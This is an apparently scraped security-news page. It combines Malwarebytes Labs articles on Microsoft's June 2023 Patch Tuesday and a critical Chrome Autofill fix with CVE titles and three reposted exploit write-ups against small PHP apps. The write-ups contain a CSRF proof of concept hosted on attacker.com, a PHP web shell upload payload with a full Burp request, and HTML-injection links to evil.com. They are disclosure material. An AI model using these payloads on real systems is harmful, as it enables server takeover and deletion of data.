Categories: Exploits and vulnerabilities
Categories: News
Tags: Microsoft

Tags:  patch Tuesday

Tags:  CVE-2023-29357

Tags:  CVE-2023-29363

Tags:  CVE-2023-32014

Tags:  CVE-2023-32015

Tags:  CVE-2023-32013

Tags:  CVE-2023-24897

Tags:  CVE-2023-32031

Tags:  SharePoint

Tags:  PGM

Tags:  Exchange

Tags:  Hyper-V

Patch Tuesday of June 2023 is relatively relaxed. No actively exploited zero-days and only six critical vulnerabilities.



(Read more...)




The post Microsoft fixes six critical vulnerabilities in June Patch Tuesday appeared first on Malwarebytes Labs.

It’s that time of the month again: We're looking at June's Patch Tuesday roundup. Microsoft has released its monthly update, and compared to previous months, it’s actually not so bad. No actively exploited zero-days and only six critical vulnerabilities.

So, we’ll have the luxury of going over those in some more detail.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The critical CVEs patched in these updates are:

CVE-2023-29357 (CVSS score: 9.8 out of 10): a Microsoft SharePoint Server Elevation of Privilege  (EoP) vulnerability. Successful exploitation could provide an attacker with administrator privileges. For the exploitation, the attacker needs no privileges nor do they require user interaction.

The Microsoft advisory states:

> "An attacker who has gained access to spoofed JWT authentication tokens can use them to execute a network attack which bypasses authentication and allows them to gain access to the privileges of an authenticated user."

JWT is a token based stateless authentication mechanism. Basically, the identity provider generates a JWT that certifies the user identity and the resource server decodes and verifies the authenticity of the token by using secret salt or public key.

CVE-2023-29363 (CVSS score: 9.8 out of 10): a Windows Pragmatic General Multicast (PGM) Remote Code Execution (RCE) vulnerability.

PGM is a reliable and scalable multicast protocol that enables receivers to detect loss, request retransmission of lost data, or notify an application of unrecoverable loss. PGM is a receiver-reliable protocol, which means the receiver is responsible for ensuring all data is received, absolving the sender of reception responsibility. It is mainly used for delivering multicast data such as video streaming or online gaming.

CVE-2023-32014 (CVSS score: 9.8 out of 10): another PGM RCE vulnerability.

CVE-2023-32015 (CVSS score: 9.8 out of 10): another PGM RCE vulnerability.

For all the PGM vulnerabilities, Microsoft points out that: when Windows message queuing service is running in a PGM Server environment, an attacker could send a specially crafted file over the network to achieve remote code execution and attempt to trigger malicious code.

The Windows message queuing service, which is a Windows component, needs to be enabled for a system to be exploitable by this vulnerability. This feature can be added via the Control Panel. You can check to see if there is a service running named Message Queuing and TCP port 1801 is listening on the machine.

CVE-2023-32013 (CVSS score: 6.5 out of 10): a Windows Hyper-V Denial of Service (DoS) vulnerability. Successful exploitation of this vulnerability requires an attacker to prepare the target environment to improve exploit reliability.

Hyper-V is Microsoft's hardware virtualization product. It lets you create and run virtual machines, which are software emulations of a computer system.

CVE-2023-24897 (CVSS score: 7.8 out of 10): a .NET, .NET Framework, and Visual Studio Remote Code Execution (RCE) vulnerability. The word "Remote" refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE) because the attack itself is carried out locally.

I’d like to throw one important vulnerability in the mix because we expect to hear more about it, because it is, well, you know, Exchange.

CVE-2023-32031 (CVSS score: 8.8 out of 10): a Microsoft Exchange Server Remote Code Execution (RCE) vulnerability. An attacker could target the server accounts in an arbitrary or remote code execution. As an authenticated user, the attacker could attempt to trigger malicious code in the context of the server's account through a network call.

This is typically a vulnerability that is used in a chained attack, because the attacker will need access to a vulnerable host in the network to gain the necessary authentication they need to successfully exploit this vulnerability.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

*   Cisco released security updates for several products
*   Google released security updates for Google Chrome
*   Google also released its Android June 2023 updates
*   SAP has released its June 2023 Patch Day updates
*   VMware released VMware ESXi updates

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Microsoft fixes six critical vulnerabilities in June Patch Tuesday

Online Examination System Project version 1.0 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)# Google Dork: n/a# Date: 09/06/2023# Exploit Author: Ramil Mustafayev (kryptohaker)# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Version: 1.0# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28# CVE : n/aOnline Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.To exploit this vulnerability, an attacker needs to do the following:1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:<html>  <body>    <form action="http://example.com/update.php" method="GET">      <input type="hidden" name="demail" value="victim@example.com" />    </form>    <script>      document.forms[0].submit();    </script>  </body></html>4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html5. Send the URL of the HTML page to the admin user via email, social media, or any other means.If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.

Online Examination System Project 1.0 Cross Site Request Forgery

Teachers Record Management System version 1.0 suffers from file upload validation bypass vulnerability.

    Exploit Title: Teachers Record Management System 1.0 – File Upload Type ValidationDate: 17-01-2023EXPLOIT-AUTHOR: AFFAN AHMEDVendor Homepage: <https://phpgurukul.com>Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>Version: 1.0Tested on: Windows 11 + XAMPPCVE : CVE-2023-3187===============================STEPS_TO_REPRODUCE===============================1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com”Password: Test@123”2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image3. Open the Burp-suite and Intercept the Edit Image Request4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”5. Change the **Content-type from “ image/png “ to “ image/gif “6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**8. Below is the Burpsuite-POST Request for all the changes that I have made above==========================================BURPSUITE_REQUEST==========================================POST /trms/teacher/changeimage.php HTTP/1.1Host: localhostContent-Length: 442Cache-Control: max-age=0sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: <http://localhost>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: <http://localhost/trms/teacher/changeimage.php>Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qcConnection: close------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="subjects"John Doe------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"Content-Type: image/gifGIF89a <?php echo system($_REQUEST['dx']); ?>------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="submit"------WebKitFormBoundaryndAPYa0GGOxSUHdF--===============================PROOF_OF_CONCEPT===============================GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md

Teachers Record Management System 1.0 Validation Bypass

Sales Tracker Management System version 1.0 suffers from an html injection vulnerability.

Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities   
Google Dork: NA  
Date: 09-06-2023  
EXPLOIT-AUTHOR: AFFAN AHMED  
Vendor Homepage: <https://www.sourcecodester.com/>  
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>  
Version: 1.0  
Tested on: Windows 11 + XAMPP  
CVE : CVE-2023-3184

==============================  
CREDENTIAL TO USE  
==============================  
ADMIN-ACCOUNT  
USERNAME: admin  
PASSWORD: admin123

=============================  
PAYLOAD_USED  
=============================  
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>  
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>  
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>  
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>

===============================  
STEPS_TO_REPRODUCE  
===============================  
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN  CREDENTIALS OF ADMIN   
2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user`   
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename`  `lastname` and in `username`   
4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON  
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER  IS ADDED  .  
6. AFTER CLICKING ON THE  EACH PAYLOAD IT REDIRECT ME TO EVIL SITE

==========================================  
BURPSUITE_REQUEST  
==========================================  
POST /php-sts/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 1037  
sec-ch-ua:   
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36  
sec-ch-ua-platform: ""  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/php-sts/admin/?page=user/manage_user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn  
Connection: close

------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="id"

------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="username"

<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="password"

1234  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="type"

2  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundary7hwjNQW3mptDFOwo--

===============================  
PROOF_OF_CONCEPT  
===============================  
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md

Sales Tracker Management System 1.0 HTML Injection

Windows CryptoAPI  Denial of Service Vulnerability

CVE-2023-24937

Categories: Exploits and vulnerabilities
Categories: News
Tags: Google

Tags:  Chrome

Tags:  Autofill

Tags:  payments critical

Tags:  CVE-2023-3214

Google has released an update which includes five security fixes including a critical vulnerability in Autofill payments.



(Read more...)




The post Update Chrome now! Google fixes critical vulnerability in Autofill payments appeared first on Malwarebytes Labs.

Google has released a Chrome update which includes five security fixes. One of these security fixes is for a critical vulnerability in Autofill payments.

Google labels vulnerabilities as critical if they allow an attacker to run arbitrary code on the underlying platform with the user's privileges in the normal course of browsing.

**How to protect yourself**

If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible. 114.0.5735.130/.131 for Android will become available on Google Play over the next few days.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities in this batch. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

_Chrome needs a relaunch to apply the update_

After the update, your version should be 114.0.5735.133 for Mac and Linux, and 114.0.5735.133/134 for Windows, or later.

**The critical vulnerability**

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The critical CVE patched in these updates is listed as CVE-2023-3214:  Use after free in Autofill payments in Google Chrome prior to 114.0.5735.133 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Google is always very careful about providing information about vulnerabilities, for obvious reasons. Access to bug details and links may be kept restricted until a majority of users are updated with a fix. However, from the vulnerability description we can learn a few things.

The Autofill payments function is to automatically enter payment details in online forms.

Use after free (UAF) is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.

Heap corruption occurs when a program modifies the contents of a memory location outside of the memory allocated to the program. The outcome can be relatively benign and cause a memory leak, or it may be fatal and cause a memory fault, usually in the program that causes the corruption.

A remote attack means that this vulnerability could potentially be exploited by tricking the user into visiting a specially crafted website.

Whether all this actually means that vulnerable Chrome versions will spill payments details on such a website remains to be seen, but it’s not the unlikeliest of scenarios.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update Chrome now! Google fixes critical vulnerability in Autofill payments

Windows TPM Device Driver Elevation of Privilege Vulnerability

CVE-2023-29360

Windows GDI Elevation of Privilege Vulnerability

CVE-2023-29371

Windows Resilient File System (ReFS) Remote Code Execution Vulnerability

CVE-2023-32008

Windows Collaborative Translation Framework Elevation of Privilege Vulnerability

Tag

#windows